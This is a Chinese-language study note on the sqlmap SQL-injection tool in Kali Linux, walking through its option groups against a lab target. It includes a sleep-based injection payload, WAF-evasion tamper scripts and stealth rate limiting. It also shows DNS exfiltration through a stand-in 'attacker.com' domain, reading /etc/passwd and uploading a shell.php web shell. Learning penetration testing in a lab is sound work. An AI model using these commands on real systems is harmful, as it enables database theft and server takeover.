Kali Linux学习笔记—SQLMAP 自动注入

概述

简介

• 开源 sql 注入漏洞检测、利用工具
• 检测动态页面中get/post参数、cookie、http头
• 数据榨取
• 文件系统访问
• 操作系统命令执行
• 引擎强大、特性丰富
• Xss漏洞检测

---

五种漏洞检测技术

• 基于布尔的盲注检测
• 基于时间的盲注检测
  • ' and (select * from(select(sleep(20)))a)--+
  • 判断服务器执行时间长短
• 基于错误的检测
• 基于UNION联合查询的检测
  • 适用于通过循环直接输出联合查询结果，否则只显示第一项结果
• 基于堆叠查询的检测
  • ;堆叠多个查询语句
  • 适用于非select的数据修改、删除的操作
• 支持的数据库管理系统DBMS
  • MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB等

---

其他特性

• 数据库直接连接 -d
  • 发现漏洞和管理员账号密码后，不用单独安装数据库客户端程序，sqlmap可直接作为客户端程序连到服务器端口。
  • 不通过SQL注入，制定身份认证信息、IP、端口
• 与BurpSuite、google结合使用，支持正则表达式限定测试目标
• Get、post、cookie、Referer、User-Agent（随机或指定）
  • cookie过期后自动处理Set-Cookie头，探测新的cookie，更新cookie信息
• 限速：最大并发、延迟发送（为了隐蔽不被服务器端发现）
• 支持Basic、Digest、NTLM、CA身份认证
• 数据库版本、用户、权限、hash枚举和字典破解、暴力破解表列名称
• 文件上传下载、UDF、启动并执行存储过程、操作系统命令执行、访问windows注册表
• 与w3af、metasploit集成结合使用，基于数据库服务进程提权和上传执行后门。

---

使用说明

基于python2.7开发（2015）

安装

安装
apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
升级
sqlmap --update 在线
git pull 		离线
Kali集成版随kali库更新

实验环境

Metasploitable：172.16.2.65
Web application：Mutillidae

kali linux：172.16.2.63

参数大类

1. 查看功能参数
	sqlmap -h /-hh
-h 仅简单的功能参数  -hh所有的功能参数

2. 功能参数类型：
	Target：指定目标
	Request
	Optimization：性能优化
	Injection
	Detection
	Techniques
	Enumeration
	Operating system access
	General
	Miscellaneous

Target

 Target：指定目标
 -d			另外打开一个连接作为数据库客户端程序连接服务器
 -u			指定一个URL让sqlmap去扫
 -l			逐个url来自burp或者webscarab代理的日志文件检测是否有可利用的注入点
 -m			把多个url保存成文本文件通过-m提交给sqlmap
 -r			可以把http的请求头信息提交给sqlmap
 -g			使用google+正则表达式
 -c			把多个让sqlmap执行的命令保存成配置文件

• 使用BurpSuite记录post提交给sqlmap
  
  然后sqlmap -l log.txt -p username
  

Request

sql注入基于http协议，http协议的各种头以及通过http上传到服务器数据的内容就是request这一类型的参数作用所在。
两种提交post请求的方法：1.BurpSuite代理生成的log文件 2.BupSuite把提交过程中生成的http头信息以及数据段的信息都复制出来放到文本类文件中。

数据段 -data
 get / post都适用
 get方法：输入的值包含在url地址里
 参数提交部分放到--data里
 get方式可把?后的内容放到--data中
 sqlmap -u "http://1.1.1.1/a.php" --data="user=1&pass=2" -f

post方式：

get方法：把完整url拆开为url+data

变量分隔符： --param-del
有些web application在提交数据时不使用&来分隔多个变量名称，有可能使用;
使用--param-del告诉sqlmap正在检查的url中用;代替&
sqlmap -u "http://1.1.1.1/a.php" -data="q=foo;id=1" --param-del=";" -f

cookie头  --cookie
web应用需要基于cookie的身份认证
检查cookie中的注入点（sqlmap自动测试） level>=2才会检查cookie中是否存在注入点
set-cookie/--drop-set-cookie sqlmap发现服务器set了新的cookie，提示是否使用新的cookie
sqlmap -u "" --cookid="" --dbs --level 2

--user-agent
默认情况下格式为：sqlmap/1.0-dev-xxxxxxxxxx(http://sqlmap.org)
--random-agent 随机使用user-agent，有字典文件
所有user-agent保存在 /usr/share/sqlmap/txt/user-agents.txt字典中
启动wireshark抓包右键追踪tcp流可见user-agent。
发现sqlmap去扫描目标服务器什么都发现不了，但是手工提交可以成功，
有理由怀疑目标系统上包含WAF/IDS等过滤异常的机制。

Host头： --host
只有最高扫描级别--level 5才会检查host头中是否存在sql注入漏洞

Referer头： --referer
level >=3
从一个页面点到另一个页面的链接请求中会有referer头

额外的header（自定义）： --headders
每个头单独一行（名称区分大小写）
sqlmap -u " " --headers="Host:www.abc.com\nUser-Agent:122"

限定使用get/post方法： --method
--method=POST/GET

基于HTTP协议的身份验证 --auth-type / --auth-cred
	- Basic
	- Digest
	- NTLM
	- sqlmap -u "http://1.1.1.1/a.php?id=1" --auth-type Basic --auth-cred "user:pass"
	--auth-type身份认证类型 --auth-cred账号密码

基于客户端证书认证（少见）
	--auth-file="ca.PFM"
	含有私钥的PEM格式证书文件
	PEM格式的证书链文件

http(s) 代理
 --proxy="http://127.0.0.1:8087"
 --proxy-cred="name:pass"
 --ignore-proxy 忽略系统级代理设置，通常用于扫描本地网络目标

--delay
	发送请求量过于巨大可能触发WAF等机制被过滤掉。
	设置每次http(s)请求之间延迟时间，浮点数，单位为秒，默认无延迟。
	
--timeout
	请求超时时间，浮点数，默认为30秒
	
--retries
	http(s)连接超时重试次数，默认3次
	
--randomize
	长度、类型与原始值保持一致的前提下，指定每次请求随机取值的参数名

--scope
	过滤日志内容，通过正则表达式筛选扫描对象
	sqlmap -l burp.log --scope="(www)?\.target\.(com|net|org) "
	sqlmap -l 2.log --scope="(19)?\.168\.20\.(1|10|100)" --level 3 --dbs
	User-agent中的注入点
	
--safe-url / --safe-freq
	检测和盲注阶段会产生大量失败请求，服务器端可能因此销毁session
	每发送--safe-freq次注入请求后，发送一次正常请求
	
--skip-urlencode
	默认Get方法会对传输内容进行编码，某些WEB服务器不遵守RFC标准编码，使用原始字符提交数据

--eval
	每次请求前执行指定的python代码
	每次请求更改或增加新的参数值（时间依赖、其他参数依赖）
	sqlmap -u "http://1.1.1.1/a.php?id=1&hash=hhfhgjkdhgjgfjdsghjdfghsjdfhgjdfghd" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
	

Optimization

--predict-output
	根据检测方法，比对返回值和统计表内容，不断缩小检测范围，提高检测效率
	版本名、用户名、密码、Privileges（优先级、特权）、role、数据库名称、表明、列名
	与--threads参数不兼容
	统计表： /usr/share/sqlmap/txt/common-outputs.txt

--keep-alive
	使用http(s)长连接，性能好
	与--proxy参数不兼容
	长连接避免重复建立连接的网络开销，但大量长连接会严重占用服务器资源

--null-connection
	只获取相应页面的大小值，而非页面具体内容
	通常用于盲注判断 真/假，降低网络带宽消耗
	与--text-only参数不兼容（基于页面内容的比较判断 真/假）

--threads
	最大并发线程
	盲注时每个线程获取一个字符（7次请求），获取完成后线程结束
	默认值为1，建议不要超过10，否则可能影响站点可用性
	与--predict-output参数不兼容
	

Injection

-P
	指定 扫描的参数，使--level失效
	-p "user-agent,referer"

--skip
	排除指定的扫描参数
	--level=5 --skip="id,user-agent"

URI注入点
	人工判断哪个是变量值在其后添加*
	URI是个大概念，URL、URN都是URI的具体实现
	sqlmap -u "http://targeturl/paraml/valuel*/param2/value2/"

--dbms
	通过其他手段已经知道数据库管理系统的版本
	--dbms="mysql"
	MySQL<5.0>
	Oracle<11>
	...

--os
	Linux
	Windows

--invalid-bignum / --invalid-logical
	通常sqlmap使用负值使参数取值失效 id=13 -> id=-13
	bignum使用大数使参数失效 id=9999999999
	Logical使用布尔判断使取值失效 id=13 AND 18=19

--no-cast
	榨取数据时，sqlmap将所有结果转换为字符串，并用空格替换NULL结果
	老版本mysql数据库需要开启此开关

--no-escape
	出于混淆和避免出错的目的，payload中用单引号界定字符串时，
	sqlmap使用char()编码逃逸的方法替换字符串
	select 'foo' -> select char(102)+char(111)+char(111)
	本参数将关闭此功能

--prefix / --suffix

--tamper
	混淆脚本，用于绕过应用层过滤、IPS、WAF。好几十个已经编写好的用来绕过的脚本存储在
   /usr/share/sqlmap/tamper
	sqlmap -u "http://1.1.1.1/a.php?id=1" --tamper="between.py,randomcase.py"

--level
	1-5级（默认1级）
	/usr/share/sqlmap/xml/payloads 每个级别的区别

--risk
	1-4（默认1/无害）
	risk升高可造成数据被篡改等风险（update）

--string，--not-string，--regexp，--code，----text-only，--titles
	页面比较，基于布尔的注入检测，依据返回页面内容的变化判断真假逻辑，
	但有些页面随时间阈值变化，此时需要认为指定标识真假的字符串。
	

Techniques

检测sql漏洞存在的技术类型

默认使用全部技术
B：Boolean-based blind
E：Error-based
U：Union query-based
S：Stacked queries（文件系统、操作系统、注册表必须）
T：Time-based blind

--time-sec
	基于时间的注入检测相应延迟时间（默认5秒）

--union-cols
	默认联合查询1-10列，随--level增加最多支持50列
	--union-cols 6-9

--union-char
	联合查询默认使用NULL，极端情况下NULL可能失败，此时可以手动执行数值
	--union-char 123
	
--dns-domain
	攻击者控制了某DNS服务器，使用此功能可以提高数据榨取的速度
	--dns-doamin attacker.com

--second-order
	在一个页面注入的结果，从另一个页面体现出来
	--second-order http://1.1.1.1/b.php
	

Fingerprint

指纹信息
-f，--fingerprint，-b，--banner
	数据库管理系统指纹信息
	DBMS,操作系统，架构，补丁

Enumeration 枚举

前提：当前数据库管理系统用户可以读取数据库schema信息

--current-user 
	查询当前数据库管理系统的账号

--current-db

--hostname

--users

--privileges -U username
	查询当前用户在数据库管理系统中的特权

--roles
	数据库中的角色

--dbs
	查都有哪些数据库

--tables，--exclude-sysdbs -D dvwa

-T users -D dvwa -C user --columns

--count
	查询表中有几条记录

--schema --batch --exclude-sysdbs元数据（使用默认选项）
	查询数据库的表结构

Dump数据
--dump,-C,-T,-D,--start,--stop

--dump-all --exclude-sysdbs

Brute Force

Mysql < 5.0 没有information_schema库
Mysql >= 5.0,但无权读取information_schema库
微软的Access数据库，默认无权读取MSysObjuects库
--common-tables
--common-columns (Access系统表无列信息）

UDF Injection

用户自定义函数

--udf-inject,--shared-lib
	编译共享库创建并上传至DB Server，以此生成UDF实现高级注入
	Linux：shared object
	Windows：DLL

File System

--file-read="/etc/passwd"
--file-write="shell.php" --file-dest"/tmp/shell.php"

OS

Mysql、postgresql
	上传共享库并生成sys_exec()、sys_eval()两个UDF
Mssql
	xp_cmdshell存储过程（有就用，禁了启，没有建）	

Windows Registory

--reg-read
--reg-add
--reg-del
--reg-key、--reg-value、--reg-data、--reg-type

General

-s				sqlite会话文件保存位置
-t				记录流量文件保存位置
--charset		强制字符编码
			--charset=GBK
--crawl			从起始位置爬站深度
			--batch --crawl=3
--csv-del		dump数据默认存于","分割的csv文件中，指定其他分隔符
			--csv-del=";"
--dbms-cred		指定数据库账号

--flush-session	清空session
--force-ssl
--fresh-queries	忽略session查询结果
--hex			dump非ASCII字符内容时，将其编码为16进制形式，收到后解码还原
--output-dir=/tmp
--parse-errors	分析和现实数据库内建报错信息
--save			将命令保存成配置文件

Miscellaneous

-z				参数助记符（感觉有点鸡肋）
				用双引号将需要的参数简写进去
--answer		告诉sqlmap不同的问题不同的回答，可结合--batch
--check-waf		检测WAF/IPS/IDS	
-hpp			HTTP parameter pollution
				绕过WAF/IPS/IDS的有效方法
				尤其对ASP/IIS和ASP.NET/IIS
--identify-waf 	彻底的WAF/IPS/IDS检查
--mobile		模拟智能手机设备
--purge-output	清除output文件夹
--smart			当有大量检测目标时，只选择基于错误的检测结果
--wizard		向导模式实现一个基本的sql注入

功能很强大，参数很多，需要多实践掌握做到心中有数。